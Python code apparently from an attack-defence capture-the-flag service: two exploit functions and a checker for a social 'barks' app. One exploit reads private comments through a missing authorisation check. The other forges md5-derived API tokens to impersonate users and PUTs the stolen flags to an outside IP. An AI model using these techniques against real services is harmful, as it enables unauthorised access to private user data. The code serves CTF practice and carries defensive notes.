Esempio n. 1
def sploit3(hostname: str) -> list:
    """Collect flag-shaped private comments visible to a brand-new account.

    The routine registers a throwaway user, asks the service for an API
    token, then walks up to ten pages of the "last barks" feed and reads the
    comments of every bark on them. It relies on the comments endpoint
    returning entries marked ``is_private`` to a token that belongs to an
    unrelated, freshly registered account, i.e. on a missing per-caller
    authorisation check in the service.

    Defensive takeaway: the comments API should filter ``is_private`` entries
    server-side by the caller's identity rather than only tagging them in the
    response.

    Args:
        hostname: Host of the service instance, passed straight to ``Api``.

    Returns:
        Texts of private comments that match ``FLAG_REGEXP``.
    """
    client = Api(hostname)
    # Evaluation order of the random values is kept: username first, then the
    # three remaining registration fields.
    username = get_random_string()
    client.sing_up(username, get_random_string(), get_random_string(),
                   get_random_string())

    token = client.generate_token()
    found = []
    for page_n in range(10):
        barks_list = client.api_get_last_barks(token, page_n)
        for bark in barks_list:
            for comment in client.api_comments(token, bark["id"]):
                # Only comments the service itself labels private are kept.
                if comment["is_private"] and FLAG_REGEXP.match(comment["text"]):
                    found.append(comment["text"])
        # An empty page marks the end of the feed.
        if not barks_list:
            break

    return found
Esempio n. 2
def sploit4(hostname: str) -> list:
    """Read private comments using API tokens recomputed from usernames.

    After registering a throwaway account, the routine lists the first page of
    barks and users. For every listed user it recomputes candidate tokens as
    ``md5(username + generation)`` for each value of the module-level
    ``generations`` iterable (defined outside this block) and asks
    ``api_index`` whether the candidate is accepted. With an accepted token it
    reads the comments of the collected barks and keeps private ones matching
    ``FLAG_REGEXP``.

    Defensive takeaway: the approach only works if the service derives API
    tokens deterministically from a public username and a small guessable
    value. Tokens should come from a CSPRNG (for example the ``secrets``
    module) and carry no relation to public identifiers.

    NOTE(review): the accumulated list is re-submitted in full after every
    accepted token, over plain HTTP with the team token in a header, and the
    accepted token is printed to stdout -- both leak credentials to anyone who
    can read the traffic or the logs.

    Args:
        hostname: Host of the service instance, passed straight to ``Api``.

    Returns:
        Texts of private comments that match ``FLAG_REGEXP``.
    """
    client = Api(hostname)
    username = get_random_string()
    client.sing_up(username, get_random_string(), get_random_string(),
                   get_random_string())

    own_token = client.generate_token()
    flags = []
    page_n = 0

    # Only the first page of barks and of users is inspected.
    bark_ids = [bark["id"] for bark in client.api_get_last_barks(own_token, page_n)]

    for user in client.api_get_users(own_token, page_n):
        for generation in generations:
            digest_input = f"{user['username']}{generation}".encode()
            candidate = hashlib.md5(digest_input).hexdigest()
            if not client.api_index(candidate):
                continue

            print(candidate)
            for bark_id in bark_ids:
                for comment in client.api_comments(candidate, bark_id):
                    if comment["is_private"] and FLAG_REGEXP.match(comment["text"]):
                        flags.append(comment["text"])
            print(flags)
            requests.put("http://10.118.0.10/flags",
                         headers={"X-Team-Token": TOKEN},
                         json=flags)
            # One accepted token per user is enough; move on to the next user.
            break

    return flags
Esempio n. 3
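def check(check_request: CheckRequest) -> Verdict:
    """Run the functional health check against one service instance.

    The check walks through the user-facing flow (sign-up, bark, comment,
    friend request and confirmation, login) and then through the token-based
    API (index, barks, comments, user info, user listing, last barks),
    comparing what the service returns with what was just created.

    Args:
        check_request: Request object; only ``hostname`` is read here.

    Returns:
        ``Verdict.OK()`` when every step matches, ``Verdict.MUMBLE(...)`` with
        a short reason when a step misbehaves or any unexpected exception is
        raised, and ``Verdict.DOWN(...)`` on a ``RequestException``.
    """
    api = Api(check_request.hostname)
    try:
        # NOTE(review): every web-flow guard below only fires when
        # status_code == 200, so a non-200 response skips the check instead of
        # failing it. Confirm whether `status_code != 200 or ...` was intended.
        username = get_random_str()
        password = get_random_str()
        r = api.sing_up(username, password, get_random_str(), get_random_str())
        if r.status_code == 200 and f"{api.url}/{username}/" != r.url:
            print(f"Found {r.url}, but wait {api.url}/{username}. Status code {r.status_code}")
            return Verdict.MUMBLE("can't pass registration")

        bark = get_random_text()
        r = api.add_bark(username, bark)
        # Parentheses spell out the precedence the original expression already had.
        if (r.status_code == 200 and f"{api.url}/{username}/" != r.url) or bark not in r.text:
            print(f"Found {r.url}, but wait {api.url}/{username} OR '{bark}' not in response. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't create bark")

        # The bark id is scraped from the "/get_bark/<id>" link that precedes
        # the bark text in the returned page; a layout change raises here and
        # ends up as "bad proto" below.
        bark_id = int(r.text.split(bark)[0].split("/get_bark/")[1][0:-3])
        comment = get_random_text()
        r = api.comment_bark(bark_id, comment)
        if r.status_code == 200 and comment not in r.text:
            print(f"Comment {comment} not in response. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't create comment")

        api.logout()

        new_username = get_random_str()
        new_password = get_random_str()
        # NOTE(review): the result of this second sign-up is never inspected.
        r = api.sing_up(new_username, new_password, get_random_str(), get_random_str())
        r = api.add_friend(username)

        if r.status_code == 200 and username not in r.text:
            print(f"Can't find {username} in friends list. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't add friend")

        api.logout()

        r = api.login(username, password)
        if r.status_code == 200 and f"{api.url}/{username}/" != r.url:
            print(f"Found {r.url}, but wait {api.url}/{username}. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't log in")

        r = api.confirm_friend(new_username)
        if r.status_code == 200 and username not in r.text:
            print(f"Friend {username} not found in friends list. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't confirm friend")

        token = api.generate_token()
        if not token:
            print("Can't get token")
            return Verdict.MUMBLE("can't get token")

        api.logout()

        user_dict = api.api_index(token)
        if user_dict['username'] != username or user_dict['token'] != token:
            print(f"Fields username and token isn't correct. Found: {user_dict['username']}, {user_dict['token']}. Wait: {username}, {token}")
            return Verdict.MUMBLE("api user info incorrect")

        # The texts seen so far are collected so the failure message never
        # touches an unbound loop variable: with an empty list the original
        # raised NameError and reported "bad proto" instead of this verdict.
        barks_list = api.api_barks(token, username)
        seen_barks = []
        for user_bark in barks_list:
            if user_bark['text'] == bark:
                break
            seen_barks.append(user_bark['text'])
        else:
            print(f"Wait for '{bark}', but got {seen_barks}")
            return Verdict.MUMBLE("incorrect bark")

        comments_list = api.api_comments(token, bark_id)
        seen_comments = []
        for user_comment in comments_list:
            if user_comment['text'] == comment:
                break
            seen_comments.append(user_comment['text'])
        else:
            print(f"Wait for '{comment}', but got {seen_comments}")
            return Verdict.MUMBLE("incorrect comment")

        user_info = api.api_user_info(token, username)
        if user_info['username'] != username or user_info['id'] != user_dict['id']:
            print(f"Incorrect user_info. Got {user_info['username']}, {user_info['id']}, but wait {username}, {user_dict['id']}")
            return Verdict.MUMBLE("incorrect user info")

        # The new user must show up within the first five pages of the listing.
        for i in range(0, 5):
            users_list = api.api_get_users(token, i)
            if any(u['username'] == username and u['id'] == user_dict['id'] for u in users_list):
                break
        else:
            print("can't find user via api")
            return Verdict.MUMBLE("can't find user")

        # Same for the bark; the messages used to be a copy of the user
        # lookup above and named the wrong object.
        for i in range(0, 5):
            barks_list = api.api_get_last_barks(token, i)
            if any(b['id'] == bark_id for b in barks_list):
                break
        else:
            print("can't find bark via api")
            return Verdict.MUMBLE("can't find bark")

        return Verdict.OK()
    except RequestException as e:
        print(f"can't connect due to {e}")
        return Verdict.DOWN("can't connect to host")
    except Exception as e:
        # Top-level boundary: any parsing or schema surprise counts as a
        # protocol violation by the service.
        print(e)
        return Verdict.MUMBLE("bad proto")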